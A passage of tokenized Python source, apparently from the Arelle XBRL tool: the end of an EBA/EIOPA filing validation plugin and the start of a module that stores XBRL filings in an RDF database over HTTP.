isEIOPA_2_0_1 and xValue > <NUM_LIT:1> : <EOL> modelXbrl . warning ( ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , value = xValue ) <EOL> else : <EOL> if - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:4> <EOL> elif - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:3> <EOL> elif - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:2> <EOL> elif - <NUM_LIT:1> < xValue < <NUM_LIT:1> : dMin = <NUM_LIT:1> <EOL> else : dMin = <NUM_LIT:0> <EOL> if dMin > dec : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , value = xValue , decimals = f . decimals , mindec = dMin ) <EOL> except ( AttributeError , ValueError ) : <EOL> pass <EOL> '''<STR_LIT>''' <EOL> unit = f . unit <EOL> if unit is not None : <EOL> if isMonetary : <EOL> if unit . measures [ <NUM_LIT:0> ] : <EOL> _currencyMeasure = unit . measures [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if val . isEIOPA_2_0_1 and f . context is not None : <EOL> if f . context . dimMemberQname ( val . qnDimAF ) == val . qnCAx1 and val . qnDimOC in f . context . qnameDims : <EOL> _ocCurrency = f . context . dimMemberQname ( val . qnDimOC ) . localName <EOL> if _currencyMeasure . localName != _ocCurrency : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , metric = f . qname , ocCurrency = _ocCurrency , unitCurrency = _currencyMeasure . localName ) <EOL> else : <EOL> val . currenciesUsed [ _currencyMeasure ] = unit <EOL> else : <EOL> val . currenciesUsed [ _currencyMeasure ] = unit <EOL> elif not unit . isSingleMeasure or unit . measures [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] != XbrlConst . qnXbrliPure : <EOL> nonMonetaryNonPureFacts . append ( f ) <EOL> if isEnum : <EOL> _eQn = getattr ( f , "<STR_LIT>" , None ) or qnameEltPfxName ( f , f . value ) <EOL> if _eQn : <EOL> prefixUsed ( val , _eQn . namespaceURI , _eQn . prefix ) <EOL> if val . 
isEIOPA_2_0_1 and f . qname . localName == "<STR_LIT>" : <EOL> val . reportingCurrency = _eQn . localName <EOL> elif isString : <EOL> if f . xmlLang : <EOL> stringFactsWithXmlLang . append ( f ) <EOL> if f . isNil : <EOL> nilFacts . append ( f ) <EOL> if val . footnotesRelationshipSet . fromModelObject ( f ) : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID ) <EOL> if nilFacts : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = nilFacts , nilFacts = "<STR_LIT:U+002CU+0020>" . join ( str ( f . qname ) for f in nilFacts ) ) <EOL> if stringFactsWithXmlLang : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = stringFactsWithXmlLang , factsWithLang = "<STR_LIT:U+002CU+0020>" . join ( set ( str ( f . qname ) for f in stringFactsWithXmlLang ) ) ) <EOL> if nonMonetaryNonPureFacts : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = nonMonetaryNonPureFacts , langLessFacts = "<STR_LIT:U+002CU+0020>" . join ( set ( str ( f . qname ) for f in nonMonetaryNonPureFacts ) ) ) <EOL> val . utrValidator . validateFacts ( ) <EOL> unitHashes = { } <EOL> for unit in modelXbrl . units . values ( ) : <EOL> h = unit . hash <EOL> if h in unitHashes and unit . isEqualTo ( unitHashes [ h ] ) : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = ( unit , unitHashes [ h ] ) , unit1 = unit . id , unit2 = unitHashes [ h ] . id ) <EOL> if not getattr ( modelXbrl , "<STR_LIT>" , False ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = ( unit , unitHashes [ h ] ) , unit1 = unit . id , unit2 = unitHashes [ h ] . id ) <EOL> else : <EOL> unitHashes [ h ] = unit <EOL> for _measures in unit . measures : <EOL> for _measure in _measures : <EOL> prefixUsed ( val , _measure . namespaceURI , _measure . 
prefix ) <EOL> del unitHashes <EOL> cntxHashes = { } <EOL> for cntx in modelXbrl . contexts . values ( ) : <EOL> h = cntx . contextDimAwareHash <EOL> if h in cntxHashes and cntx . isEqualTo ( cntxHashes [ h ] ) : <EOL> if not getattr ( modelXbrl , "<STR_LIT>" , False ) : <EOL> modelXbrl . log ( "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = ( cntx , cntxHashes [ h ] ) , cntx1 = cntx . id , cntx2 = cntxHashes [ h ] . id ) <EOL> else : <EOL> cntxHashes [ h ] = cntx <EOL> for _dim in cntx . qnameDims . values ( ) : <EOL> _dimQn = _dim . dimensionQname <EOL> prefixUsed ( val , _dimQn . namespaceURI , _dimQn . prefix ) <EOL> if _dim . isExplicit : <EOL> _memQn = _dim . memberQname <EOL> else : <EOL> _memQn = _dim . typedMember . qname <EOL> if _memQn : <EOL> prefixUsed ( val , _memQn . namespaceURI , _memQn . prefix ) <EOL> for elt in modelDocument . xmlRootElement . iter ( ) : <EOL> if isinstance ( elt , ModelObject ) : <EOL> prefixUsed ( val , elt . qname . namespaceURI , elt . qname . prefix ) <EOL> for attrTag in elt . keys ( ) : <EOL> if attrTag . startswith ( "<STR_LIT:{>" ) : <EOL> _prefix , _NS , _localName = XmlUtil . clarkNotationToPrefixNsLocalname ( elt , attrTag , isAttribute = True ) <EOL> if _prefix : <EOL> prefixUsed ( val , _NS , _prefix ) <EOL> elif val . isEIOPA_2_0_1 : <EOL> if elt . tag in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument ) <EOL> elif isinstance ( elt , etree . _Comment ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , comment = elt . text ) <EOL> def validateNonStreamingFinish ( val , * args , ** kwargs ) : <EOL> if not getattr ( val . modelXbrl , "<STR_LIT>" , False ) : <EOL> final ( val ) <EOL> def validateStreamingFinish ( val , * args , ** kwargs ) : <EOL> final ( val ) <EOL> def final ( val ) : <EOL> if not ( val . 
validateEBA or val . validateEIOPA ) : <EOL> return <EOL> modelXbrl = val . modelXbrl <EOL> modelDocument = modelXbrl . modelDocument <EOL> _statusMsg = _ ( "<STR_LIT>" ) . format ( val . disclosureSystem . name ) <EOL> modelXbrl . profileActivity ( ) <EOL> modelXbrl . modelManager . showStatus ( _statusMsg ) <EOL> if modelDocument . type == ModelDocument . Type . INSTANCE and ( val . validateEBA or val . validateEIOPA ) : <EOL> if not modelDocument . uri . endswith ( "<STR_LIT>" ) : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , extension = os . path . splitext ( modelDocument . basename ) [ <NUM_LIT:1> ] ) <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , extension = os . path . splitext ( modelDocument . basename ) [ <NUM_LIT:1> ] ) <EOL> if val . isEIOPA_2_0_1 : _encodings = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : _encodings = ( "<STR_LIT:utf-8>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if modelDocument . documentEncoding not in _encodings : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , xmlEncoding = modelDocument . documentEncoding ) <EOL> schemaRefElts = [ ] <EOL> schemaRefFileNames = [ ] <EOL> for doc , docRef in modelDocument . referencesDocument . items ( ) : <EOL> if docRef . referenceType == "<STR_LIT>" : <EOL> if docRef . referringModelObject . localName == "<STR_LIT>" : <EOL> schemaRefElts . append ( docRef . referringModelObject ) <EOL> schemaRefFileNames . append ( doc . basename ) <EOL> if not UrlUtil . isAbsolute ( doc . uri ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = docRef . referringModelObject , url = doc . uri , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> elif docRef . referringModelObject . 
localName == "<STR_LIT>" : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = docRef . referringModelObject , fileName = doc . basename ) <EOL> _numSchemaRefs = len ( XmlUtil . children ( modelDocument . xmlRootElement , XbrlConst . link , "<STR_LIT>" ) ) <EOL> if _numSchemaRefs > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , numEntryPoints = _numSchemaRefs , entryPointNames = '<STR_LIT:U+002CU+0020>' . join ( sorted ( schemaRefFileNames ) ) ) <EOL> if len ( schemaRefElts ) != <NUM_LIT:1> : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = schemaRefElts , entryPointCount = len ( schemaRefElts ) ) <EOL> if not getattr ( modelXbrl , "<STR_LIT>" , False ) : <EOL> val . qnReportedCurrency = None <EOL> if val . isEIOPA_2_0_1 and qnMetReportingCurrency in modelXbrl . factsByQname : <EOL> for _multiCurrencyFact in modelXbrl . factsByQname [ qnMetReportingCurrency ] : <EOL> val . qnReportedCurrency = _multiCurrencyFact . xValue <EOL> break <EOL> validateFacts ( val , modelXbrl . facts ) <EOL> xbrlFactsCheckVersion = None <EOL> expectedSumOfFactMd5s = None <EOL> for pi in modelDocument . xmlRootElement . getchildren ( ) : <EOL> if isinstance ( pi , etree . _ProcessingInstruction ) and pi . target == "<STR_LIT>" : <EOL> _match = re . search ( "<STR_LIT>" , pi . text ) <EOL> if _match : <EOL> _matchGroups = _match . groups ( ) <EOL> if len ( _matchGroups ) == <NUM_LIT:2> : <EOL> if _matchGroups [ <NUM_LIT:0> ] == "<STR_LIT:version>" : <EOL> xbrlFactsCheckVersion = _matchGroups [ <NUM_LIT:1> ] <EOL> elif _matchGroups [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> try : <EOL> expectedSumOfFactMd5s = Md5Sum ( _matchGroups [ <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> modelXbrl . 
error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelXbrl , sumOfMd5 = _matchGroups [ <NUM_LIT:1> ] ) <EOL> if xbrlFactsCheckVersion and expectedSumOfFactMd5s : <EOL> sumOfFactMd5s = Md5Sum ( ) <EOL> for f in modelXbrl . factsInInstance : <EOL> sumOfFactMd5s += f . md5sum <EOL> if sumOfFactMd5s != expectedSumOfFactMd5s : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelXbrl , expectedMd5 = expectedSumOfFactMd5s , actualMd5Sum = sumOfFactMd5s ) <EOL> else : <EOL> modelXbrl . info ( "<STR_LIT:info>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelXbrl ) <EOL> if any ( badError in modelXbrl . errors <EOL> for badError in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> pass <EOL> elif not val . filingIndicators : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> elif all ( filed == False for filed in val . filingIndicators . values ( ) ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> if val . numFilingIndicatorTuples > <NUM_LIT:1> : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelXbrl . factsByQname [ qnFIndicators ] ) <EOL> if len ( val . cntxDates ) > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = set ( _cntx for _cntxs in val . cntxDates . values ( ) for _cntx in _cntxs ) , <EOL> dates = '<STR_LIT:U+002CU+0020>' . join ( XmlUtil . dateunionValue ( _dt , subtractOneDay = True ) <EOL> for _dt in val . cntxDates . keys ( ) ) ) <EOL> if val . unusedCntxIDs : <EOL> if val . isEIOPA_2_0_1 : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . contexts [ unusedCntxID ] for unusedCntxID in val . unusedCntxIDs if unusedCntxID in modelXbrl . 
contexts ] , <EOL> unusedContextIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedCntxIDs ) ) ) <EOL> else : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . contexts [ unusedCntxID ] for unusedCntxID in val . unusedCntxIDs if unusedCntxID in modelXbrl . contexts ] , <EOL> unusedContextIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedCntxIDs ) ) ) <EOL> if len ( val . cntxEntities ) > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , count = len ( val . cntxEntities ) , <EOL> entities = "<STR_LIT:U+002CU+0020>" . join ( sorted ( str ( cntxEntity ) for cntxEntity in val . cntxEntities ) ) ) <EOL> for _scheme , _LEI in val . cntxEntities : <EOL> if ( _scheme in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) or <EOL> ( not val . isEIOPAfullVersion and _scheme == "<STR_LIT>" ) ) : <EOL> result = LeiUtil . checkLei ( _LEI ) <EOL> if result == LeiUtil . LEI_INVALID_LEXICAL : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , lei = _LEI ) <EOL> elif result == LeiUtil . LEI_INVALID_CHECKSUM : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , lei = _LEI ) <EOL> if _scheme == "<STR_LIT>" : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , scheme = _scheme ) <EOL> elif _scheme == "<STR_LIT>" : <EOL> pass <EOL> else : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , scheme = _scheme ) <EOL> if val . unusedUnitIDs : <EOL> if val . isEIOPA_2_0_1 : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . units [ unusedUnitID ] for unusedUnitID in val . unusedUnitIDs if unusedUnitID in modelXbrl . units ] , <EOL> unusedUnitIDs = "<STR_LIT:U+002CU+0020>" . 
join ( sorted ( val . unusedUnitIDs ) ) ) <EOL> else : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . units [ unusedUnitID ] for unusedUnitID in val . unusedUnitIDs if unusedUnitID in modelXbrl . units ] , <EOL> unusedUnitIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedUnitIDs ) ) ) <EOL> if len ( val . currenciesUsed ) > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = val . currenciesUsed . values ( ) , numCurrencies = len ( val . currenciesUsed ) , currencies = "<STR_LIT:U+002CU+0020>" . join ( str ( c ) for c in val . currenciesUsed . keys ( ) ) ) <EOL> elif val . isEIOPA_2_0_1 and any ( _measure . localName != val . reportingCurrency for _measure in val . currenciesUsed . keys ( ) ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = val . currenciesUsed . values ( ) , reportingCurrency = val . reportingCurrency , currencies = "<STR_LIT:U+002CU+0020>" . join ( str ( c ) for c in val . currenciesUsed . keys ( ) ) ) <EOL> if val . prefixesUnused : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , unusedPrefixes = '<STR_LIT:U+002CU+0020>' . join ( sorted ( val . prefixesUnused ) ) ) <EOL> for ns , prefixes in val . namespacePrefixesUsed . items ( ) : <EOL> nsDocs = modelXbrl . namespaceDocs . get ( ns ) <EOL> if nsDocs : <EOL> for nsDoc in nsDocs : <EOL> nsDocPrefix = XmlUtil . xmlnsprefix ( nsDoc . xmlRootElement , ns ) <EOL> if any ( prefix != nsDocPrefix for prefix in prefixes if prefix is not None ) : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , namespace = ns , declaredPrefix = nsDocPrefix , foundPrefixes = '<STR_LIT:U+002CU+0020>' . 
join ( sorted ( prefixes - { None } ) ) ) <EOL> elif ns in CANONICAL_PREFIXES and any ( prefix != CANONICAL_PREFIXES [ ns ] for prefix in prefixes if prefix is not None ) : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , namespace = ns , declaredPrefix = CANONICAL_PREFIXES [ ns ] , foundPrefixes = '<STR_LIT:U+002CU+0020>' . join ( sorted ( prefixes - { None } ) ) ) <EOL> modelXbrl . profileActivity ( _statusMsg , minTimeToShow = <NUM_LIT:0.0> ) <EOL> modelXbrl . modelManager . showStatus ( None ) <EOL> del val . prefixNamespace , val . namespacePrefix , val . idObjects , val . typedDomainElements <EOL> del val . utrValidator , val . firstFact , val . footnotesRelationshipSet <EOL> __pluginInfo__ = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dislosureSystemTypes , <EOL> '<STR_LIT>' : disclosureSystemConfigURL , <EOL> '<STR_LIT>' : validateSetup , <EOL> '<STR_LIT>' : validateNonStreamingFinish , <EOL> '<STR_LIT>' : validateStreamingFacts , <EOL> '<STR_LIT>' : validateStreamingFinish , <EOL> } </s>
<s> '''<STR_LIT>''' <EOL> import os , io , time , json , socket , logging , zlib , datetime <EOL> from arelle . ModelDtsObject import ModelConcept , ModelResource , ModelRelationship <EOL> from arelle . ModelInstanceObject import ModelFact <EOL> from arelle . ModelDocument import Type <EOL> from arelle import XbrlConst , XmlUtil , UrlUtil <EOL> import urllib . request <EOL> from urllib . error import HTTPError , URLError <EOL> from lxml import etree <EOL> TRACERDFFILE = None <EOL> RDFTURTLEFILE_HOSTNAME = "<STR_LIT>" <EOL> RDFXMLFILE_HOSTNAME = "<STR_LIT>" <EOL> def insertIntoDB ( modelXbrl , <EOL> user = None , password = None , host = None , port = None , database = None , timeout = None , <EOL> product = None , rssItem = None , ** kwargs ) : <EOL> rdfdb = None <EOL> try : <EOL> rdfdb = XbrlSemanticRdfDatabaseConnection ( modelXbrl , user , password , host , port , database , timeout ) <EOL> rdfdb . insertXbrl ( rssItem = rssItem ) <EOL> rdfdb . close ( ) <EOL> except Exception as ex : <EOL> if rdfdb is not None : <EOL> try : <EOL> rdfdb . close ( rollback = True ) <EOL> except Exception as ex2 : <EOL> pass <EOL> raise <EOL> def isDBPort ( host , port , db , timeout = <NUM_LIT:10> ) : <EOL> if host in ( RDFTURTLEFILE_HOSTNAME , RDFXMLFILE_HOSTNAME ) : <EOL> return True <EOL> t = <NUM_LIT:2> <EOL> while t < timeout : <EOL> try : <EOL> conn = urllib . request . urlopen ( "<STR_LIT>" . format ( host , port or '<STR_LIT>' , db ) ) <EOL> return True <EOL> except HTTPError : <EOL> return False <EOL> except URLError : <EOL> return False <EOL> except socket . 
timeout : <EOL> t = t + <NUM_LIT:2> <EOL> return False <EOL> Namespace = URIRef = Literal = Graph = L = XSD = RDF = RDFS = None <EOL> DEFAULT_GRAPH_CLASS = None <EOL> XML = XBRL = XBRLI = LINK = QName = Filing = DTS = Aspect = AspectType = None <EOL> DocumentTypes = RoleType = ArcRoleType = Relationship = ArcRoleCycles = None <EOL> DataPoint = Context = Period = Unit = None <EOL> SEC = None <EOL> def initRdflibNamespaces ( ) : <EOL> global Namespace , URIRef , Literal , Graph , L , XSD , RDF , RDFS , DEFAULT_GRAPH_CLASS <EOL> if Namespace is None : <EOL> from rdflib import Namespace , URIRef , Literal , Graph <EOL> from rdflib import Literal as L <EOL> from rdflib . namespace import XSD , RDF , RDFS <EOL> DEFAULT_GRAPH_CLASS = Graph <EOL> global XML , XBRL , XBRLI , LINK , QName , Filing , DTS , Aspect , AspectType , DocumentTypes , RoleType , ArcRoleType , Relationship , ArcRoleCycles , DataPoint , Context , Period , Unit , SEC <EOL> if XML is None : <EOL> XML = Namespace ( "<STR_LIT>" ) <EOL> XBRL = Namespace ( "<STR_LIT>" ) <EOL> XBRLI = Namespace ( "<STR_LIT>" ) <EOL> LINK = Namespace ( "<STR_LIT>" ) <EOL> QName = Namespace ( "<STR_LIT>" ) <EOL> Filing = Namespace ( "<STR_LIT>" ) <EOL> DTS = Namespace ( "<STR_LIT>" ) <EOL> DocumentTypes = { Type . INSTANCE : XBRL . Instance , <EOL> Type . INLINEXBRL : XBRL . InlineHtml , <EOL> Type . SCHEMA : XBRL . Schema , <EOL> Type . LINKBASE : XBRL . Linkbase , <EOL> Type . UnknownXML : XML . 
Document } <EOL> Aspect = Namespace ( "<STR_LIT>" ) <EOL> AspectType = Namespace ( "<STR_LIT>" ) <EOL> RoleType = Namespace ( "<STR_LIT>" ) <EOL> ArcRoleType = Namespace ( "<STR_LIT>" ) <EOL> Relationship = Namespace ( "<STR_LIT>" ) <EOL> ArcRoleCycles = Namespace ( "<STR_LIT>" ) <EOL> DataPoint = Namespace ( "<STR_LIT>" ) <EOL> Context = Namespace ( "<STR_LIT>" ) <EOL> Period = Namespace ( "<STR_LIT>" ) <EOL> Unit = Namespace ( "<STR_LIT>" ) <EOL> SEC = Namespace ( "<STR_LIT>" ) <EOL> def modelObjectDocumentUri ( modelObject ) : <EOL> return URIRef ( UrlUtil . ensureUrl ( modelObject . modelDocument . uri ) ) <EOL> def modelObjectUri ( modelObject ) : <EOL> return URIRef ( '<STR_LIT:#>' . join ( ( modelObjectDocumentUri ( modelObject ) , <EOL> XmlUtil . elementFragmentIdentifier ( modelObject ) ) ) ) <EOL> def qnameUri ( qname , sep = '<STR_LIT:#>' ) : <EOL> return URIRef ( sep . join ( ( qname . namespaceURI , qname . localName ) ) ) <EOL> def qnamePrefix_Name ( qname , sep = '<STR_LIT:_>' ) : <EOL> prefix = { XbrlConst . xsd : '<STR_LIT>' , <EOL> XbrlConst . xml : '<STR_LIT>' , <EOL> XbrlConst . xbrli : '<STR_LIT>' , <EOL> XbrlConst . link : '<STR_LIT>' , <EOL> XbrlConst . gen : '<STR_LIT>' , <EOL> XbrlConst . xlink : '<STR_LIT>' <EOL> } . get ( qname . namespaceURI , qname . prefix ) <EOL> return L ( sep . join ( ( prefix , qname . localName ) ) ) <EOL> def modelObjectQnameUri ( modelObject , sep = '<STR_LIT:#>' ) : <EOL> return qnameUri ( modelObject . qname , sep ) <EOL> class XRDBException ( Exception ) : <EOL> def __init__ ( self , code , message , ** kwargs ) : <EOL> self . code = code <EOL> self . message = message <EOL> self . kwargs = kwargs <EOL> self . args = ( self . __repr__ ( ) , ) <EOL> def __repr__ ( self ) : <EOL> return _ ( '<STR_LIT>' ) . format ( self . code , self . message % self . 
kwargs ) <EOL> class XbrlSemanticRdfDatabaseConnection ( ) : <EOL> def __init__ ( self , modelXbrl , user , password , host , port , database , timeout ) : <EOL> try : <EOL> initRdflibNamespaces ( ) <EOL> except ImportError : <EOL> raise XRDBException ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) ) <EOL> self . modelXbrl = modelXbrl <EOL> self . disclosureSystem = modelXbrl . modelManager . disclosureSystem <EOL> self . isRdfTurtleFile = host == RDFTURTLEFILE_HOSTNAME <EOL> self . isRdfXmlFile = host == RDFXMLFILE_HOSTNAME <EOL> if self . isRdfTurtleFile or self . isRdfXmlFile : <EOL> self . turtleFile = database <EOL> else : <EOL> connectionUrl = "<STR_LIT>" . format ( host , port or '<STR_LIT>' ) <EOL> self . url = connectionUrl <EOL> if database : <EOL> self . url += '<STR_LIT:/>' + database <EOL> auth_handler = urllib . request . HTTPBasicAuthHandler ( ) <EOL> if user : <EOL> auth_handler . add_password ( realm = None , <EOL> uri = connectionUrl , <EOL> user = user , <EOL> passwd = password ) <EOL> self . conn = urllib . request . build_opener ( auth_handler ) <EOL> self . timeout = timeout or <NUM_LIT> <EOL> self . verticePropTypes = { } <EOL> def close ( self , rollback = False ) : <EOL> try : <EOL> if not ( self . isRdfTurtleFile or self . isRdfXmlFile ) : <EOL> self . conn . close ( ) <EOL> self . __dict__ . clear ( ) <EOL> except Exception as ex : <EOL> self . __dict__ . clear ( ) <EOL> raise <EOL> @ property <EOL> def isClosed ( self ) : <EOL> return not bool ( self . __dict__ ) <EOL> def showStatus ( self , msg , clearAfter = None ) : <EOL> self . modelXbrl . modelManager . showStatus ( msg , clearAfter ) <EOL> def initializeGraph ( self , graph = None ) : <EOL> g = graph or DEFAULT_GRAPH_CLASS ( ) <EOL> g . bind ( "<STR_LIT>" , XML ) <EOL> g . bind ( "<STR_LIT>" , XBRL ) <EOL> g . bind ( "<STR_LIT>" , XBRLI ) <EOL> g . bind ( "<STR_LIT>" , LINK ) <EOL> g . bind ( "<STR_LIT>" , QName ) <EOL> g . bind ( "<STR_LIT>" , Filing ) <EOL> g . 
bind ( "<STR_LIT>" , DTS ) <EOL> g . bind ( "<STR_LIT>" , Aspect ) <EOL> g . bind ( "<STR_LIT>" , AspectType ) <EOL> g . bind ( "<STR_LIT>" , RoleType ) <EOL> g . bind ( "<STR_LIT>" , ArcRoleType ) <EOL> g . bind ( "<STR_LIT>" , ArcRoleCycles ) <EOL> g . bind ( "<STR_LIT>" , Relationship ) <EOL> g . bind ( "<STR_LIT>" , DataPoint ) <EOL> g . bind ( "<STR_LIT>" , Context ) <EOL> g . bind ( "<STR_LIT>" , Period ) <EOL> g . bind ( "<STR_LIT>" , Unit ) <EOL> g . bind ( "<STR_LIT>" , SEC ) <EOL> return g <EOL> def execute ( self , activity , graph = None , query = None ) : <EOL> if graph is not None : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:Content-Type>' : "<STR_LIT>" } <EOL> data = graph . serialize ( format = '<STR_LIT>' if self . isRdfXmlFile else '<STR_LIT>' , <EOL> encoding = '<STR_LIT>' ) <EOL> elif query is not None : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> data = ( "<STR_LIT>" + query ) . encode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> return None <EOL> if TRACERDFFILE : <EOL> with io . open ( TRACERDFFILE , "<STR_LIT>" ) as fh : <EOL> fh . write ( b"<STR_LIT>" ) <EOL> fh . write ( data ) <EOL> if ( self . isRdfTurtleFile or self . isRdfXmlFile ) and data is not None : <EOL> with io . open ( self . turtleFile , "<STR_LIT>" ) as fh : <EOL> fh . write ( data ) <EOL> return None <EOL> if graph is not None or query is not None : <EOL> url = self . url + "<STR_LIT>" <EOL> request = urllib . request . Request ( url , <EOL> data = data , <EOL> headers = headers ) <EOL> try : <EOL> with self . conn . open ( request , timeout = self . timeout ) as fp : <EOL> results = fp . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> try : <EOL> results = json . loads ( results ) <EOL> except ValueError : <EOL> pass <EOL> except HTTPError as err : <EOL> results = err . fp . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> if TRACERDFFILE : <EOL> with io . 
